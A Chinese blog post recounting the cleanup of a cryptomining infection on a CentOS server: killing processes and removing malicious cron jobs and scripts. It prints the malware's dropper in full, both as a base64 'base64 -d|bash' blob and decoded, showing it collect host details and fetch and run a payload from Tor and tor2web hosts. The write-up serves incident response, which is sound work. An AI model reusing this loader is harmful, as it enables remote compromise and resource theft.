挖矿病毒处理

最新推荐文章于 2024-07-22 17:33:57 发布
最新推荐文章于 2024-07-22 17:33:57 发布
阅读量2.1k 收藏
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p763833631/article/details/123662175
版权

 服务器异常 top 发现CPU负载很高

[root@iZ23dx8oo0qZ ~]# crontab -e
定时任务里注释掉或清理掉异常的类似 28 * * * * /root/.systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh > /dev/null 2>&1 & 

文件/root/.systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh也删除掉

hxGYGSgg这个占用CPU很高的进程导致的

[root@iZ23dx8oo0qZ ~]# ps -ef |grep hxGYGSgg

[root@iZ23dx8oo0qZ ~]# kill -9 3102

手动杀掉后

之后top

发现又出现新的进程占用CPU很高

杀掉这个后  又出来

crontab里删除过的异常定时任务也又出现了  再次删除

查看是否注释掉或已删除掉异常定时任务,文件是root用户用crontab -e编辑保存后的文件
[root@iZ23dx8oo0qZ ~]# vim /var/spool/cron/root

[root@iZ23dx8oo0qZ ~]# cat /etc/cron.d/
0hourly                                            raid-check                                         
0systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps  sysstat                                            
[root@iZ23dx8oo0qZ ~]# cat /etc/cron.d/0systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps 
18 * * * * root /opt/systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh > /dev/null 2>&1 &

 删除

[root@iZ23dx8oo0qZ ~]# rm /etc/cron.d/0systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps

opt下面的这个异常的也删除掉


[root@iZ23dx8oo0qZ ~]# cat /opt/systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh 
#!/bin/bash
exec &>/dev/null
echo 2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps
echo Mmtwb1FyNUFKSkhzR0xXTXF2RmVTNnFTS0g5VlBLcHMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiMjV3bGtzZDM1YzJmczU1cm5obGNmejNqamF1anhtYm1ma3ZyeGV1N3RrZ25uZXNkaGgzZ2docWQiKQoKc29ja3ooKSB7Cm49KGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2ggZG9oLmxpIGRvaC5wdWIgZmkuZG9oLmRucy5zbm9weXRhLm9yZyBoeWRyYS5wbGFuOS1uczEuY29tIHJlc29sdmVyLWV1LmxlbHV4LmZpIGRucy5ob3N0dXgubmV0IGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpxPSR7blskKChSQU5ET00lJHsjbltAXX0pKV19CnM9JCgkYyBodHRwczovLyRxLyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfHRhaWwgLTEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@iZ23dx8oo0qZ ~]# rm /opt/systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh 
rm: remove regular file `/opt/systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh'? y
[root@iZ23dx8oo0qZ ~]#

/tmp/.X11-unix/目录也删除掉

[root@iZ23dx8oo0qZ ~]# crontab -l
28 * * * * /root/.systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh > /dev/null 2>&1 &

[root@iZ23dx8oo0qZ ~]# cat /root/.systemd-private-2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps.sh 
#!/bin/bash
exec &>/dev/null
echo 2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps
echo Mmtwb1FyNUFKSkhzR0xXTXF2RmVTNnFTS0g5VlBLcHMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiMjV3bGtzZDM1YzJmczU1cm5obGNmejNqamF1anhtYm1ma3ZyeGV1N3RrZ25uZXNkaGgzZ2docWQiKQoKc29ja3ooKSB7Cm49KGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2ggZG9oLmxpIGRvaC5wdWIgZmkuZG9oLmRucy5zbm9weXRhLm9yZyBoeWRyYS5wbGFuOS1uczEuY29tIHJlc29sdmVyLWV1LmxlbHV4LmZpIGRucy5ob3N0dXgubmV0IGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpxPSR7blskKChSQU5ET00lJHsjbltAXX0pKV19CnM9JCgkYyBodHRwczovLyRxLyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfHRhaWwgLTEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash


base64_decode 之后

2kpoQr5AJJHsGLWMqvFeS6qSKH9VPKps
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "25wlksd35c2fs55rnhlcfz3jjaujxmbmfkvrxeu7tkgnnesdhh3gghqd")

sockz() {
n=(dns.digitale-gesellschaft.ch doh.li doh.pub fi.doh.dns.snopyta.org hydra.plan9-ns1.com resolver-eu.lelux.fi dns.hostux.net dns.twnic.tw doh-fi.blahdns.com resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
q=${n[$((RANDOM%${#n[@]}))]}
s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

p763833631
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《网络安全自学教程》- 挖矿病毒排查思路和处置步骤
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项中,挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
php+挖矿病毒,Kdevtmpfsi 挖矿病毒处理方式
weixin_42165712的博客
03-11 621
中毒线上状态:CPU占满90%+,引发线上服务处理异常缓慢等问题,从而导致业务异常。处理方法:1. 查看占用高的进程。# top2. 排序按下1,找到占用高CPU的进程后,Ctrl+z退出。3. 查找对应的进程号。(可以使用pgrep来更加精确查询)# ps -aux | grep kdevtmpfsi# ps -aux | grep kinsing4. 杀掉该进程。# kill -9 12739...
JAVA单商户商城系统源码,前(vue)后(SpringBoot)端分离,支持多平台(h5,小程序,app)
Python代码大全
01-08 1352
linjiashop 是一个基于和的web商城系统linjiashop 包含了商城的后台管理系统,手机h5,小程序版本linjiashop 采用作为底层基础框架搭建,开发过程遇到问题请多阅读该项目文档。linjiashop 是一个采用MIT协议的开源商城系统,任何人任何单位可以免费使用该商城和基于该项目开发搭建自己的商城系统。
centos7 tmp目录出现systemd-private 类似文件夹
ycxwoo的博客
09-04 9336
//解决向tmp 目录创建文件 ,系统转存到其他目录 症状 /tmp/systemd-private-9301532e5ff749e388f365a25f51e9ea-mariadb.service-zvKlrX/tmp/ /tmp/systemd-private-9301532e5ff749e388f365a25f51e9ea-httpd.service-HRR15v/ 原因...
挖矿病毒应急处置
最新发布
2301_77977773的博客
07-22 1682
windows server2016虚拟机(切记千万不要再物理机上运行挖矿病毒2024 年 7 月 22 日, 接到XX 局用户电话反馈局域网内有一些终端设备在运行一段时间后出现莫名卡顿,怀疑内网感染了挖矿病毒。客户要求查出来原因,确认出影响范围,删除相关病毒文件并找出如如何感染的,梳理出时间链。从而避免下次出现相同的问题。
2019-8-28 [Linux] Centos7 的/usr/tmp自动清理系统 删除后出现systemd-private 类似文件夹怎么办
景子墨的博客
08-28 2801
一. 系统自动清理 在Centos 7下,系统使用systemd管理易变与临时文件,/tmp目录的清理规则主要取决于/usr/lib/tmpfiles.d/tmp.conf文件的设定,默认的配置内容为: # Clear tmp directories separately, to make them easier to override v /tmp 1777 root root 10d ...
/tmp目录下出现system-private文件夹解决方法
Sk1y的博客
03-14 2965
/tmp目录下出现system-private文件夹解决方法 问题的由来 我在vsp上测试文件上传的时候,发现文件不会正常的出现在/tmp目录下,而是会生成一个system-private-xxxx文件夹,然后文件会上传到其中。 原因: 这是因为开启了PrivateTmp服务,方便清理/tmp中的文件(因为/tmp文件夹中所有用户都有写和读的权限,文件多了之后就得一个一个清除,这个服务就是用来方便自动清除文件的) 查看开启了PrivateTmp的服务 grep -R PrivateTmp /etc/syst
linux笔记
徐天伦的博客
11-22 3602
linux中一切皆文件top与ps命令很相似,他们都是用来显示正在执行的进程。top与ps最大的不同之处,在于top在执行一段时间可以更新正在运行的进程。
Centos挖矿病毒处理过程
2301_77388529的博客
04-03 932
服务器系统中毒后一般会出现异常进程,负载高,CPU占用高,带宽跑满的情况, 为防止你的服务器中招建议服务器 FTP 数据库 网站 Redis等请勿使用简单的密码 轻的只会跑资源 严重的删网站删库 下面说下中毒的处理流程。建议:处理完成之后备份好数据重装系统,病毒作者可能还留有后门,重装系统后加强密码 服务器管理 安装相应的防御软件 希望该教程能让你get到技能。rm /bin/dhpcd ###确定该进程不是自己安装的删除该文件,不确定可以先mv到其他目录。直接使用”dd”,删除计划任务。
一次挖矿病毒处理过程
weixin_42433054的博客
12-13 9815
事件背景 深度威胁检测设备发现大量的DNS response of a queried malware Command and Control domain告警事件,尝试进行C&C攻击,根据分析,因终端感染病毒病毒文件尝试访问恶意网址,首先到DNS上进行解析,但是内网DNS无法解析到该域名,导致解析失败,同时该恶意域名被入侵检测设备检测到。现在明确终端中毒,本次过程通过深入发掘通信...
记一次centos中挖矿病毒处理经过
a345203172的专栏
10-08 1653
环境:centos7.6 挖矿进程:rabiit 1、先关闭无用对外端口 (例如redis端口,mysql端口等),限制可以ssh登录的ip地址,可以用last查看近期远程登录的用户,确认是否存在可疑IP或者用户 2、查看定时任务情况(这个可以查看/var/log/cron文件,是否存在可疑定时任务执行日志),查看可以定时任务的启动位置,删除可疑定时任务 crontab -e /var/spool/cron/ /etc/crontab /etc/cr...
《Linux运维实战:阿里云上查杀挖矿病毒故障总结》
热门推荐
东城绝神
07-08 1万+
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录系列文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例
DevOps:Linux系统之dd命令详解
GIS摆渡人
03-06 8993
1.Linux dd 命令用于读取、转换并输出数据。2.dd 可从标准输入或文件中读取数据,根据指定的格式来转换数据,再输出到文件、设备或标准输出。
Systemd Unit文件中PrivateTmp字段详解-Jason.Zhi
weixin_30391339的博客
06-28 583
如下图,在开发调试的时候会遇到这么一个问题。 file_put_contents时,$tmp_file显示的目标文件是/tmp/xxx.而这个文件实际放在linux的目录却是/tmp/systemd-private-xxxxx-php-fpm.service/xxx(见图二) 为什么会出现这种情况? 只要使用Systemd这个进程作为启动进程的linux系统,其子进程都会有...
linux基础文件管理
weixin_43254438的博客
06-18 225
shell基础语法 命令行bash shell,为用户提供输入,执行命令的界面 #命令 选项 参数 command [-options] [arguments] [root@server ~]# ls //命令 [root@server ~]# ls -l //命令+选项 [root@server ~]# ls -l /ho...
Hadoop基础之《(8)—yarn dr.who用户漏洞被挖矿
csj50的专栏
01-31 867
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务。5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件。1、检查/tmp和/var/tmp目录,删除异常文件。2、检查crontab -l,删除可疑脚本。2、构建json文件。
解决linux中挖矿病毒
chen_jianjian的专栏
07-13 8371
服务器服务不响应 有同事反应gitlab无法使用,登录服务器后台,发现有个进程占用CPU很高,进程名异常 获取病毒绝对路径 [root@localhost ~]# cat /proc/17521/cmdline wswfEOH6[root@localhost ~]# ls -l /proc/17521/exe lrwxrwxrwx. 1 root root 0 7月 13 10:03 /proc/17521/exe -> /root/b5e9c4b2a988579aa182c393.
阿里云中挖矿病毒
qq_35312979的博客
07-29 316
阿里云中挖矿病毒 top查询显示 杀死进程 kill -9 进程id 查看定时任务 crontab -l 显示 找到systemd-private-40bYxD6q2wJlcfWdXBdw8YJQEuDsM6O.sh删除掉 观察了一个小时又出现,找到/var/spool/cron的root文件,打开发现是病毒定时执行文件,删除root然后重新创建一个 设置chmod 000 root 之后cpu正常了 但是病毒文件依然存在,只是不会有进程了 ...
CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web
dkgee
12-13 4447
特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统的crontab –l显示调度列表如下: 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看脚本内容: #!/bin/bash exec &>/dev/null echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFU...
centos挖矿病毒
04-26
一旦感染,挖矿病毒会在受感染的计算机上运行一个或多个挖矿程序,这些程序会利用计算机的处理能力和电力资源来进行加密货币的挖矿操作。这样的行为会导致计算机性能下降、电力消耗增加,并且可能会给用户带来经济...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值